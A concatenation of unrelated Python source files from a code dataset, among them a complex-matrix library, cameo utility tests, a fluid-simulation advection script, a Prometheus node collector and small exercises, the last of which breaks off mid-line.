round(math.atan2(num1[1], num1[0]), 3)\n return fase1\n\n\ndef suma_vecto(vect1, vect2):\n resultado = []\n if len(vect1) != len(vect1):\n print(\"Error: diferent lenght vectors\")\n for i in range(len(vect1)):\n suma_real = suma(vect1[i], vect2[i])\n resultado += [suma_real]\n return resultado\n\n\ndef inverse(num):\n num2 = num[0] * -1, num[1] * -1\n return num2\n\n\ndef inverse_vecto(vect):\n for i in range(len(vect)):\n vect[i] = inverse(vect[i])\n return vect\n\n\ndef multi_esc(num, vect):\n resultado = []\n for i in range(len(vect)):\n multi_vect = multi(num, vect[i])\n resultado += [multi_vect]\n return resultado\n\n\ndef suma_mat(mat1, mat2):\n resultado = []\n for i in range(len(mat1)):\n suma = suma_vecto(mat1[i], mat2[i])\n resultado += [suma]\n return resultado\n\n\ndef inverse_mat(mat):\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n mat[i][j] = inverse(mat[i][j])\n return mat\n\n\ndef multi_esc_mat(num, mat):\n resultado = []\n for i in range(len(mat)):\n mult = multi_esc(num, mat[i])\n resultado += [mult]\n return resultado\n\n\ndef traspuesta(vect):\n n = len(vect) # filas\n m = len(vect[0]) # columnas\n matriz = [[0 for i in range(n)] for j in range(m)]\n for i in range(n):\n for j in range(m):\n matriz[j][i] = vect[i][j]\n return matriz\n\n\ndef conjugada_mat(mat):\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n mat[i][j] = conjugado(mat[i][j])\n return mat\n\n\ndef adjunta(mat):\n mat2 = [[mat[i][j] for j in range(len(mat[0]))] for i in range(len(mat))]\n mat2 = conjugada_mat(mat2)\n mat2 = traspuesta(mat2)\n return mat2\n\n\ndef producto(mat1, mat2):\n if len(mat1[0]) != len(mat2):\n return \"Is not possible\"\n else:\n matriz = [[(0, 0) for i in range(len(mat2[0]))] for j in range(len(mat1))]\n for i in range(len(mat1)):\n for j in range(len(mat2[0])):\n for k in range(len(mat1[0])):\n matriz[i][j] = suma(matriz[i][j], multi(mat1[i][k], mat2[k][j]))\n return matriz\n\n\ndef Accion(mat, vect):\n rta = producto(mat, vect)\n return rta\n\n\ndef product_int(vect1, vect2):\n if isinstance(vect1[0], tuple) or isinstance(vect2[0], tuple):\n rta = (0, 0)\n if len(vect1) == len(vect2):\n for i in range(len(vect1)):\n rta = suma(rta, (multi(vect1[i], vect2[i])))\n return rta\n else:\n vect = adjunta(vect1)\n rta = producto(vect, vect2)\n return rta[0][0]\n\n\ndef norma(vect):\n suma = 0\n for i in range(len(vect)):\n suma += (modulo(vect[i]) ** 2)\n return round(suma ** (1 / 2), 2)\n\n\ndef distancia(vect1, vect2):\n resultado = []\n if len(vect1) != len(vect1):\n print(\"Error: diferent lenght vectors\")\n else:\n for i in range(len(vect1)):\n resta_vect = resta(vect1[i], vect2[i])\n resultado += [resta_vect]\n return abs(norma(resultado))\n\n\ndef unit(mat):\n if len(mat) == len(mat[0]):\n In = [[(0, 0) for j in range(len(mat[0]))] for i in range(len(mat))]\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n if i == j:\n In[i][j] = (1, 0)\n mat1 = adjunta(mat)\n product = producto(mat1, mat)\n rta = True\n for i in range(len(mat)):\n for j in range(len(mat)):\n if product[i][j] != In[i][j]:\n rta = False\n if rta:\n return True\n else:\n return False\n else:\n return \"The input have to be a square matrix\"\n\n\ndef herm(mat):\n aux = mat[:]\n mat2 = adjunta(aux)\n rta = True\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n if mat[i][j] == mat2[i][j] and mat[i][j] == mat2[i][j]:\n continue\n else:\n rta = False\n return rta\n\n\ndef tensor(mat1, mat2):\n for i in range(len(mat1)):\n for j in range(len(mat2)):\n h = mat1[i][j]\n mat1[i][j] = multi_esc_mat(h, mat2)\n return mat1\n\n\ndef printmatrix(matrix):\n for row in range(len(matrix)):\n print(''.join(map(str, matrix[row])))\n\ndef matriz(mat,vect,clicks):\n for j in range(clicks):\n new_vect=producto(mat,vect)\n vect=new_vect\n return vect\n\nprint(matriz([[(0,0),(0,0),(1/18,0),(2/18,0),(5/18,0),(10/18,0)],[(0,0),(0,0),(2/18,0),(1/18,0),(10/18,0),(5/18,0)],[(1/9,0),(2/9,0),(1/6,0),(2/6,0),(1/18,0),(2/18,0)],[(2/9,0),(1/9,0),(2/6,0),(1/6,0),(2/18,0),(1/18,0)],[(2/9,0),(4/9,0),(1/9,0),(2/9,0),(0,0),(0,0)],[(4/9,0),(2/9,0),(2/9,0),(1/9,0),(0,0),(0,0)]],[[(0.001, 0)], [(0.045, 0)], [(0.004, 0)], [(0.009, 0)], [(0.855, 0)], [(0.085, 0)]],2))\n#c_2(15,8)","sub_path":"ComplexNumbers/new_complejos.py","file_name":"new_complejos.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"16407895","text":"#!/usr/bin/env python2\n#reducer.py\nimport sys\n\nSUM_WRITERS = 0\nNUM_TITLES = 0\n\nfor line in sys.stdin:\n titles, writers = line.strip().split(\"\\t\")\n SUM_WRITERS += int(writers)\n NUM_TITLES += int(titles)\nresult = SUM_WRITERS/float(NUM_TITLES)\nresult = int(round(result))\nprint(str(result))\n","sub_path":"task7/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"335489855","text":"# Copyright 2014 Novo Nordisk Foundation Center for Biosustainability, DTU.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import, print_function\n\nimport os\nimport unittest\nfrom functools import partial\nfrom itertools import chain\n\nfrom cobra import Metabolite\nfrom six.moves import range\n\nfrom cameo.io import load_model\nfrom cameo.flux_analysis.simulation import lmoma\nfrom cameo.network_analysis.util import distance_based_on_molecular_formula\nfrom cameo.util import TimeMachine, generate_colors, Singleton, partition, RandomGenerator, frozendict, ProblemCache\n\n\nTESTDIR = os.path.dirname(__file__)\nTESTMODEL = load_model(os.path.join(TESTDIR, 'data/EcoliCore.xml'), sanitize=False)\n\n\nclass TimeMachineTestCase(unittest.TestCase):\n def setUp(self):\n self.tm = TimeMachine()\n\n def test_one_change_list(self):\n l = [1, 2, 3, 4]\n self.tm(do=partial(l.append, 5), undo=l.pop)\n self.assertEqual(l, [1, 2, 3, 4, 5])\n self.tm.reset()\n self.assertEqual(l, [1, 2, 3, 4])\n\n def test_str_handles_different_types_of_stored_operations(self):\n def normal_function():\n pass\n\n partial_function = partial(str, 1)\n self.tm(do=normal_function, undo=partial_function)\n self.assertEqual(self.tm.__str__().split('\\n')[2:-1],\n [\"undo: \" + str(str) + \" (1,) {}\", 'redo: normal_function'])\n\n def test_with_statement(self):\n l = [1, 2, 3, 4]\n with TimeMachine() as tm:\n tm(do=partial(l.append, 33), undo=partial(l.pop))\n tm(do=partial(l.append, 66), undo=partial(l.pop))\n tm(do=partial(l.append, 99), undo=partial(l.pop))\n self.assertEqual(l, [1, 2, 3, 4])\n\n\ndef some_method_that_adds_stuff(model, cache):\n assert isinstance(cache, ProblemCache)\n\n def create_variable(model, var_id, lb, ub):\n return model.solver.interface.Variable(var_id, ub=ub, lb=lb)\n\n def update_variable(model, var, lb, ub):\n var.lb = lb\n var.ub = ub\n\n def create_constraint(model, cid, vars, lb, ub):\n return model.solver.interface.Constraint(vars[0] + vars[1], ub=ub, lb=lb)\n\n def update_constraint(model, constraint, vars, lb, ub):\n constraint.lb = lb\n constraint.ub = ub\n\n for i in range(10):\n cache.add_variable(\"var_%i\" % (i+1), create_variable, update_variable, 10, 15)\n\n for i in range(9):\n v1 = cache.variables[\"var_%i\" % (i+1)]\n v2 = cache.variables[\"var_%i\" % (i+2)]\n cache.add_constraint(\"c_%i\" % (i+1), create_constraint, update_constraint, [v1, v2], -20, 100)\n\n\nclass TestProblemCache(unittest.TestCase):\n def setUp(self):\n self.reference = TESTMODEL.solve().fluxes\n self.n_constraints = len(TESTMODEL.solver.constraints)\n self.n_variables = len(TESTMODEL.solver.variables)\n\n def test_add_variable(self):\n cache = ProblemCache(TESTMODEL)\n add_var = lambda model, var_id: model.solver.interface.Variable(var_id, ub=0)\n update_var = lambda model, var: setattr(var, \"ub\", 1000)\n for i in range(10):\n cache.add_variable(\"%i\" % i, add_var, update_var)\n\n for i in range(10):\n self.assertIn(cache.variables[\"%i\" % i], TESTMODEL.solver.variables)\n self.assertEqual(cache.variables[\"%i\" % i].ub, 0)\n self.assertEqual(TESTMODEL.solver.variables[\"%i\" % i].ub, 0)\n\n for i in range(10):\n cache.add_variable(\"%i\" % i, add_var, update_var)\n self.assertEqual(cache.variables[\"%i\" % i].ub, 1000)\n self.assertEqual(TESTMODEL.solver.variables[\"%i\" % i].ub, 1000)\n\n cache.reset()\n\n for i in range(10):\n self.assertRaises(KeyError, TESTMODEL.solver.variables.__getitem__, \"%i\" % i)\n\n def test_add_constraint(self):\n cache = ProblemCache(TESTMODEL)\n\n add_var = lambda model, var_id: model.solver.interface.Variable(var_id, ub=0)\n add_constraint = lambda m, const_id, var: m.solver.interface.Constraint(var, lb=-10, ub=10, name=const_id)\n update_constraint = lambda model, const, var: setattr(const, \"ub\", 1000)\n\n for i in range(10):\n cache.add_variable(\"%i\" % i, add_var, None)\n cache.add_constraint(\"c%i\" % i, add_constraint, update_constraint, cache.variables[\"%i\" % i])\n\n for i in range(10):\n self.assertIn(cache.constraints[\"c%i\" % i], TESTMODEL.solver.constraints)\n self.assertEqual(cache.constraints[\"c%i\" % i].ub, 10)\n self.assertEqual(cache.constraints[\"c%i\" % i].lb, -10)\n self.assertEqual(TESTMODEL.solver.constraints[\"c%i\" % i].ub, 10)\n self.assertEqual(TESTMODEL.solver.constraints[\"c%i\" % i].lb, -10)\n\n for i in range(10):\n cache.add_constraint(\"c%i\" % i, add_constraint, update_constraint, cache.variables[\"%i\" % i])\n self.assertEqual(TESTMODEL.solver.constraints[\"c%i\" % i].ub, 1000)\n\n cache.reset()\n\n for i in range(10):\n self.assertRaises(KeyError, TESTMODEL.solver.variables.__getitem__, \"%i\" % i)\n self.assertRaises(KeyError, TESTMODEL.solver.constraints.__getitem__, \"c%i\" % i)\n\n def test_cache_problem(self):\n # After the number of variables and constraints remains the same if nothing happens\n self.assertEqual(self.n_constraints, len(TESTMODEL.solver.constraints))\n self.assertEqual(self.n_variables, len(TESTMODEL.solver.variables))\n\n cache = ProblemCache(TESTMODEL)\n some_method_that_adds_stuff(TESTMODEL, cache)\n # After running some_method_that_adds_stuff with cache, problem has 10 more variables\n self.assertEqual(self.n_variables+10, len(TESTMODEL.solver.variables))\n # And has 9 more more constraints\n self.assertEqual(self.n_constraints+9, len(TESTMODEL.solver.constraints))\n\n cache.reset()\n # After reset cache, the problem should return to its original size\n self.assertEqual(self.n_constraints, len(TESTMODEL.solver.constraints))\n self.assertEqual(self.n_variables, len(TESTMODEL.solver.variables))\n\n def test_with(self):\n with ProblemCache(TESTMODEL) as cache:\n some_method_that_adds_stuff(TESTMODEL, cache)\n # After running some_method_that_adds_stuff with cache, problem has 10 more variables\n self.assertEqual(self.n_variables+10, len(TESTMODEL.solver.variables))\n # And has 9 more more constraints\n self.assertEqual(self.n_constraints+9, len(TESTMODEL.solver.constraints))\n\n # If the method runs again, it does not add repeated variables\n some_method_that_adds_stuff(TESTMODEL, cache)\n # After running some_method_that_adds_stuff with cache, problem has 10 more variables\n self.assertEqual(self.n_variables+10, len(TESTMODEL.solver.variables))\n # And has 9 more more constraints\n self.assertEqual(self.n_constraints+9, len(TESTMODEL.solver.constraints))\n\n # After reset cache, the problem should return to its original size\n self.assertEqual(self.n_constraints, len(TESTMODEL.solver.constraints))\n self.assertEqual(self.n_variables, len(TESTMODEL.solver.variables))\n\n\nclass TestRandomGenerator(unittest.TestCase):\n def setUp(self):\n self.seed = 1234\n\n def test_random(self):\n random = RandomGenerator()\n for _ in range(1000):\n self.assertGreaterEqual(random.random(), 0)\n self.assertLessEqual(random.random(), 1)\n\n def test_randint(self):\n random = RandomGenerator()\n lower = 0\n upper = 10\n for _ in range(10000):\n self.assertGreaterEqual(random.randint(lower, upper), lower)\n self.assertLessEqual(random.randint(lower, upper), upper)\n\n lower = -10\n upper = 100\n for _ in range(10000):\n self.assertGreaterEqual(random.randint(lower, upper), lower)\n self.assertLessEqual(random.randint(lower, upper), upper)\n\n lower = 5\n upper = 21\n for _ in range(10000):\n self.assertGreaterEqual(random.randint(lower, upper), lower)\n self.assertLessEqual(random.randint(lower, upper), upper)\n\n lower = -5\n upper = 5\n for _ in range(10000):\n self.assertGreaterEqual(random.randint(lower, upper), lower)\n self.assertLessEqual(random.randint(lower, upper), upper)\n\n def test_seeded_methods(self):\n random = RandomGenerator()\n\n random.seed(self.seed)\n value = random.random()\n random.seed(self.seed)\n self.assertEqual(value, random.random())\n\n random.seed(self.seed)\n value = random.randint(1, 10)\n random.seed(self.seed)\n self.assertEqual(value, random.randint(1, 10))\n\n random.seed(self.seed)\n population = [1, 2, 3, 4, 5]\n value = random.sample(population, 2)\n random.seed(self.seed)\n self.assertEqual(value, random.sample(population, 2))\n\n random.seed(self.seed)\n value = random.uniform()\n random.seed(self.seed)\n self.assertEqual(value, random.uniform())\n\n\nclass TestUtils(unittest.TestCase):\n def test_color_generation(self):\n for i in range(1, 100):\n color_map = generate_colors(i)\n self.assertEqual(len(color_map), i)\n self.assertEqual(len(color_map), len(set(color_map.values())))\n\n def test_partition(self):\n chunks = 3\n iterables = [\n [1, 2, 3, 4, 5, 6, 7, 8, 9],\n {5, 3, 8, 3, 8, 5, 8, 0, 10, 11, 15},\n range(29)\n ]\n for fixture in iterables:\n test_output = partition(fixture, chunks)\n self.assertEqual(len(fixture), sum(map(len, test_output)))\n self.assertEqual(len(test_output), chunks)\n self.assertEqual(list(fixture), list(chain(*test_output)))\n for out_chunk in test_output:\n self.assertTrue(set(out_chunk).issubset(set(fixture)))\n\n bad_input = 5\n self.assertRaises(TypeError, partition, bad_input, chunks)\n\n def test_distance_based_on_molecular_formula(self): # from network_analysis.util\n met1 = Metabolite(\"H2O\", formula=\"H2O\")\n met2 = Metabolite(\"H2O2\", formula=\"H2O2\")\n met3 = Metabolite(\"C6H12O6\", formula=\"C6H12O6\")\n\n self.assertEqual(distance_based_on_molecular_formula(met1, met2, normalize=False), 1)\n self.assertEqual(distance_based_on_molecular_formula(met1, met2, normalize=True), 1. / 7)\n\n self.assertEqual(distance_based_on_molecular_formula(met2, met3, normalize=False), 20)\n self.assertEqual(distance_based_on_molecular_formula(met2, met3, normalize=True), 20. / 28)\n\n self.assertEqual(distance_based_on_molecular_formula(met1, met3, normalize=False), 21)\n self.assertEqual(distance_based_on_molecular_formula(met1, met3, normalize=True), 21. / 27)\n\n\nclass FrozendictTestCase(unittest.TestCase):\n def setUp(self):\n self.frozen_dict = frozendict({\"A\": 1, \"B\": 2, \"C\": 3, \"D\": 4, \"E\": [2, 3, 4, 5]})\n\n def test_frozen_attributes(self):\n self.assertRaises(AttributeError, self.frozen_dict.popitem)\n self.assertRaises(AttributeError, self.frozen_dict.pop, \"A\")\n self.assertRaises(AttributeError, self.frozen_dict.__setitem__, \"C\", 1)\n self.assertRaises(AttributeError, self.frozen_dict.setdefault, \"K\")\n self.assertRaises(AttributeError, self.frozen_dict.__delitem__, \"A\")\n self.assertRaises(AttributeError, self.frozen_dict.update)\n\n self.assertTrue(hasattr(self.frozen_dict, \"__hash__\"))\n\n\nclass TestSingleton(unittest.TestCase):\n def test_singleton(self):\n s1 = Singleton()\n s2 = Singleton()\n self.assertIs(s1, s2)\n\n\nif __name__ == \"__main__\":\n import nose\n\n nose.runmodule()\n","sub_path":"tests/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":12378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"371659361","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 15 16:48:49 2016\n\n@author: medialab\n\"\"\"\nimport pygame\n\ndef typetext(frame_surface,string,pos,color = (255,255,0),fontsize=60,bold=False):\n myfont = pygame.font.SysFont(\"Arial\", fontsize,bold)\n label = myfont.render(string, 1, color)\n frame_surface.blit(label, pos)","sub_path":"Data_Conversion/Kfunc/IO/typetext.py","file_name":"typetext.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"201631175","text":"\"\"\"\nin this script, we calculate the image per channel mean and standard\ndeviation in the training set, do not calculate the statistics on the\nwhole dataset, as per here http://cs231n.github.io/neural-networks-2/#datapre\nBased on: https://gist.github.com/jdhao/9a86d4b9e4f79c5330d54de991461fd6\n\ne.g.python extract_mean_std.py ~/coral_andreas/coral-video-identification/pytorch_segmentation/data/Coral/train/images ~/coral_andreas/coral-video-identification/pytorch_segmentation/data/Coral/mean_std_coral.json\n\"\"\"\n\nimport sys\nimport numpy as np\nfrom os import listdir\nfrom os.path import join, isdir\nfrom glob import glob\nimport cv2\nimport json\n\n# number of channels of the dataset image, 3 for color jpg, 1 for grayscale img\n# you need to change it to reflect your dataset\nCHANNEL_NUM = 3\n\n\ndef cal_dir_stat(root):\n pixel_num = 0 # store all pixel number in the dataset\n channel_sum = np.zeros(CHANNEL_NUM)\n channel_sum_squared = np.zeros(CHANNEL_NUM)\n\n im_pths = glob(join(root, \"*.png\"))\n print(\"Extracting mean and std\")\n for path in im_pths:\n im = cv2.imread(path) # image in M*N*CHANNEL_NUM shape, channel in BGR order\n im = im/255.0\n pixel_num += (im.size/CHANNEL_NUM)\n channel_sum += np.sum(im, axis=(0, 1))\n channel_sum_squared += np.sum(np.square(im), axis=(0, 1))\n bgr_mean = channel_sum / pixel_num\n bgr_std = np.sqrt(channel_sum_squared / pixel_num - np.square(bgr_mean))\n \n # change the format from bgr to rgb\n rgb_mean = list(bgr_mean)[::-1]\n rgb_std = list(bgr_std)[::-1]\n \n return rgb_mean, rgb_std\n\n# The script assumes that under train_root, there are separate directories for each class\n# of training images.\ntrain_root = sys.argv[1] \nfile_name = sys.argv[2]\nmean, std = cal_dir_stat(train_root)\nmean_std_data = {\"mean\": mean, \"std\": std}\nwith open(file_name, 'w') as f:\n json.dump(mean_std_data, f)\n","sub_path":"dataloaders/extract_mean_std.py","file_name":"extract_mean_std.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"357223849","text":"from PLC.Method import Method\nfrom PLC.Parameter import Parameter, Mixed\nfrom PLC.Filter import Filter\nfrom PLC.Auth import Auth\nfrom PLC.Slices import Slice, Slices\nfrom PLC.Persons import Person, Persons\nfrom PLC.Methods.GetSlices import GetSlices\nfrom PLC.Methods.GetPersons import GetPersons\n\nclass SliceListUserSlices(GetSlices, GetPersons):\n \"\"\"\n Deprecated. Can be implemented with GetPersons and GetSlices.\n\n Return the slices the specified user (by email address) is a member of.\n\n Users may only query slices of which they are members. PIs may\n query any of the slices at their sites. Admins may query any\n slice. If a slice that cannot be queried is specified in\n slice_filter, details about that slice will not be returned.\n \"\"\"\n\n status = \"deprecated\"\n\n roles = ['admin', 'pi', 'user']\n\n accepts = [\n Auth(),\n Person.fields['email']\n ]\n\n returns = [Slice.fields['name']]\n\n\n def call(self, auth, email):\n\n persons = GetPersons.call(self, auth, [email])\n if not persons:\n return []\n person = persons[0]\n slice_ids = person['slice_ids']\n if not slice_ids:\n return []\n\n slices = GetSlices.call(self, auth, slice_ids)\n slice_names = [slice['name'] for slice in slices]\n\n return slice_names\n","sub_path":"PLC/Methods/SliceListUserSlices.py","file_name":"SliceListUserSlices.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"381345886","text":"\"\"\"Given a string s consisting of small English letters, find and return the first\ninstance of a non-repeating character in it. If there is no such character, return '_'.\n\nasked by - Amazon\n\nExample:\nFor s = \"abacabad\", the output should be firstNotRepeatingCharacter(s) = 'c'.\nThere are 2 non-repeating characters in the string: 'c' and 'd'. Return c since it appears in the string first.\n\nFor s = \"abacabaabacaba\", the output should be\nfirstNotRepeatingCharacter(s) = '_'.\nThere are no characters in this string that do not repeat. \"\"\"\n\ndef firstNotRepeatingCharacter(s):\n l ={}\n for x in s:\n if x not in l:\n l[x] = 1\n else:\n l[x] += 1\n for x in s:\n if l[x] == 1:\n return x\n else:\n return \"_\"\n\n\n# for c in s:\n# if s.index(c) == s.rindex(c):\n# return c\n# return '_'","sub_path":"interview-practice/arrays/firstNonRepeatingCharacter.py","file_name":"firstNonRepeatingCharacter.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"104405146","text":"\"\"\"Simple test class for testing relay.\"\"\"\nimport RPi.GPIO as GPIO\n\nGPIO.setmode(GPIO.BCM)\npins = [2, 3, 4, 17]\nfor pin in pins:\n GPIO.setup(pin, GPIO.OUT)\n GPIO.output(pin, GPIO.HIGH)\nprint(\"All pins set to high\")\nwhile 1:\n inp = input(\"Enter pin number (2,3,4 or 17) and high or low: \")\n inpslit = inp.split(' ')\n to = GPIO.HIGH\n if inpslit[1] == 'low':\n to = GPIO.LOW\n GPIO.output(int(inpslit[0]), to)\n","sub_path":"relaytest.py","file_name":"relaytest.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"246356495","text":"from datetime import datetime\nimport os\nfrom pathlib import Path\n\nfrom tqdm import trange\nimport numpy as np\nfrom PIL import Image\nimport gc\n\ntry:\n from manta import *\nexcept ImportError:\n pass\n\nfrom collections import deque\nfrom perlin import TileableNoise\n\nfrom utils.smoke3_mov import args\n\n\ndef advect(v_path: Path):\n def get_param(p1):\n min_p1 = args.min_scenes\n max_p1 = args.max_scenes\n num_p1 = args.num_scenes\n p1_ = p1 / (num_p1 - 1) * (max_p1 - min_p1) + min_p1\n return p1_\n\n img_dir = os.path.join(args.log_dir, 'd_adv')\n vdb_dir = os.path.join(args.log_dir, 'd_vdb')\n\n if not os.path.exists(img_dir):\n os.makedirs(img_dir)\n\n if not os.path.exists(vdb_dir):\n os.makedirs(vdb_dir)\n\n # solver params\n res_x = args.resolution_x\n res_y = args.resolution_y\n res_z = args.resolution_z\n gs = vec3(res_x, res_y, res_z)\n\n dim = 2\n if res_z > 1: dim = 3\n s = Solver(name='main', gridSize=gs, dim=dim)\n s.timestep = args.time_step\n\n flags = s.create(FlagGrid)\n vel = s.create(MACGrid)\n density = s.create(RealGrid)\n\n flags.initDomain(boundaryWidth=args.bWidth)\n flags.fillGrid()\n setOpenBound(flags, args.bWidth, args.open_bound, FlagOutflow | FlagEmpty)\n\n vel.clear()\n density.clear()\n\n radius = gs.x * args.src_radius\n\n if (GUI):\n gui = Gui()\n gui.show(True)\n gui.nextVec3Display()\n gui.nextVec3Display()\n gui.nextVec3Display()\n # gui.pause()\n\n if res_z > 1:\n d_ = np.zeros([res_z, res_y, res_x], dtype=np.float32)\n else:\n d_ = np.zeros([res_y, res_x], dtype=np.float32)\n for t in trange(args.num_frames):\n v_path_ = v_path / f\"{t}.npz\"\n v_path_ = str(v_path_)\n with np.load(v_path_) as data:\n v = data['x']\n if res_z == 1:\n v = np.dstack((v, np.zeros([res_y, res_x, 1])))\n p = data['y']\n\n copyArrayToGridMAC(v, vel)\n\n nx = p[0, -1]\n nz = 0.5\n if res_z > 1: nz = p[1, -1]\n source = s.create(Sphere, center=gs * vec3(nx, args.src_y_pos, nz), radius=radius)\n source.applyToGrid(grid=density, value=1)\n advectSemiLagrange(flags=flags, vel=vel, grid=density, order=args.adv_order,\n openBounds=True, boundaryWidth=args.bWidth, clampMode=args.clamp_mode)\n\n copyGridToArrayReal(density, d_)\n\n img_path = os.path.join(img_dir, '%04d.png' % t)\n if res_z > 1:\n d_img = np.mean(d_[:, ::-1], axis=0) * 255\n else:\n d_img = d_[::-1] * 255\n d_img = np.stack((d_img, d_img, d_img), axis=-1).astype(np.uint8)\n d_img = Image.fromarray(d_img)\n d_img.save(img_path)\n\n # save as vdb file\n vdb_file_path = os.path.join(vdb_dir, f'{t:04}.vdb')\n density.save(vdb_file_path)\n\n s.step()\n\n\nif __name__ == '__main__':\n velocity_field = Path(\"/Users/vivanov/Projects/deep-fluids/experiments/Autoencoder/velocity_field/\")\n advect(velocity_field)\n","sub_path":"scene/smoke3_mov_advect.py","file_name":"smoke3_mov_advect.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"248586920","text":"import asyncio\nimport json\n\nfrom prometheus_client import Info\n\nfrom dadvisor.config import IP, PROXY_PORT, IS_SUPER_NODE\nfrom dadvisor.datatypes.node import Node\nfrom dadvisor.log import log\nfrom dadvisor.nodes.node_actions import register_node, remove_node, get_node_info, get_all_nodes, get_machine_info\n\nFILENAME = '/prometheus.json'\nSLEEP_TIME = 60\n\nCHECK_REMOVE = 10\n\nNODE_INFO = Info('node', 'Nodes', ['host'])\n\n\nclass NodeCollector(object):\n \"\"\"\n Collect information about other nodes. The dAdvisor needs to be fully connected, as it needs to communicate with\n other nodes if it detects a dataflow between its own peer and a remote peer.\n \"\"\"\n\n def __init__(self, loop):\n self.loop = loop\n self.running = True\n self.my_node = Node(IP, PROXY_PORT, IS_SUPER_NODE)\n self.other_nodes = []\n self.set_scraper([])\n self.check_removal_counter = 0\n self.my_node_stats = {}\n\n async def set_my_node_stats(self):\n num_cores, memory = await get_machine_info()\n self.my_node_stats = {\n 'num_cores': num_cores,\n 'memory': memory\n }\n self.set_node_info(self.my_node, self.my_node_stats)\n\n @staticmethod\n def set_node_info(node: Node, data):\n NODE_INFO.labels(host=node.ip).info({\n 'port': str(node.port),\n 'num_cores': str(data['num_cores']),\n 'memory': str(data['memory']),\n 'is_super_node': str(node.is_super_node)})\n\n async def run(self):\n \"\"\"\n This run method performs the following two actions:\n 1. register this peer in the tracker\n 2. continuously perform the following actions:\n - validate other nodes\n :return:\n \"\"\"\n register_node(self.loop, self.my_node)\n\n while self.running:\n try:\n await asyncio.sleep(SLEEP_TIME)\n self.loop.create_task(self.add_nodes(await get_all_nodes()))\n self.check_removal_counter += 1\n if self.check_removal_counter == CHECK_REMOVE:\n self.check_removal_counter = 0\n self.loop.create_task(self.check_nodes())\n except Exception as e:\n log.error(e)\n\n @property\n def nodes(self):\n return [self.my_node] + self.other_nodes\n\n def is_other_node(self, ip):\n for node in self.other_nodes:\n if node.ip == ip:\n return node\n return None\n\n async def add_nodes(self, data_list):\n new_nodes = []\n found_my_node = False\n for node_json in data_list['list']:\n node_data = node_json['node']\n node = Node(node_data['ip'], int(node_data['port']), node_data['is_super_node'])\n\n if node == self.my_node:\n found_my_node = True\n elif node not in self.other_nodes:\n self.set_node_info(node, await get_node_info(node))\n new_nodes.append(node)\n\n if not found_my_node:\n register_node(self.loop, self.my_node)\n self.other_nodes += new_nodes\n\n async def check_nodes(self):\n \"\"\" Removes the nodes that cannot be reached \"\"\"\n remove_nodes = []\n for node in self.other_nodes:\n info = await get_node_info(node)\n if not info:\n remove_nodes.append(node)\n for node in remove_nodes:\n self.other_nodes.remove(node)\n\n @staticmethod\n def set_scraper(nodes):\n \"\"\" Set a line with federation information. Prometheus is configured in\n such a way that it reads this file. \"\"\"\n try:\n with open(FILENAME, 'r') as file:\n old_data = file.read()\n except FileNotFoundError:\n old_data = ''\n\n node_list = [f'localhost:{PROXY_PORT}']\n for node in nodes:\n node_list.append('{}:{}'.format(node.ip, node.port))\n\n data = [{\"labels\": {\"job\": \"dadvisor\"}, \"targets\": node_list}]\n new_data = json.dumps(data) + '\\n'\n log.debug(new_data)\n\n if old_data != new_data:\n with open(FILENAME, 'w') as file:\n file.write(new_data)\n\n async def stop(self):\n self.running = False\n remove_node(self.loop, self.my_node)\n","sub_path":"dadvisor/nodes/node_collector.py","file_name":"node_collector.py","file_ext":"py","file_size_in_byte":4290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"209488588","text":"#import\nimport random\n\n#code\n\nclass Cube():\n \"\"\"Classe definissant un cube caracterise par :\n - ses coordonnees, x, y, z\n - sa largueur\n - sa longueur\n - sa hauteur\"\"\"\n\n def __init__(self, x, y, z, larg, long, haut):\n \"\"\"constructeur de la classe cube\n\n exemple de creation d'un cube : c1 = Cube(0,0,0,10,10,10)\n (creation d'un cube de coordonnees x = y = z = 0 et de taille 10\n \"\"\"\n self.x = x\n self.y = y\n self.z = z\n self.larg = larg\n self.long = long\n self.haut = haut\n\n \n def safficher(self):\n \"\"\"Methode d'affichage d'un cube au format :\n cube[x= , y= , z= , larg= , long= , haut= ]\n \"\"\"\n print(\"Cube(x=\",self.x,\",y=\",self.y,\",z=\",self.z,\", larg=\",self.larg,\",long=\",self.long,\",haut=\",self.haut,\")\")\n\n\n def getPos(self):\n \"\"\"return la position du cube sous forme d'un triplet -> (x, y, z)\"\"\"\n return self.x, self.y, self.z\n\n def toSaveF(self, f):\n \"\"\"Ecrit les coordonnees du cube dans le fichier ouvert passe en argument, avec ';' comme separation\"\"\"\n f.write('Cube;' + 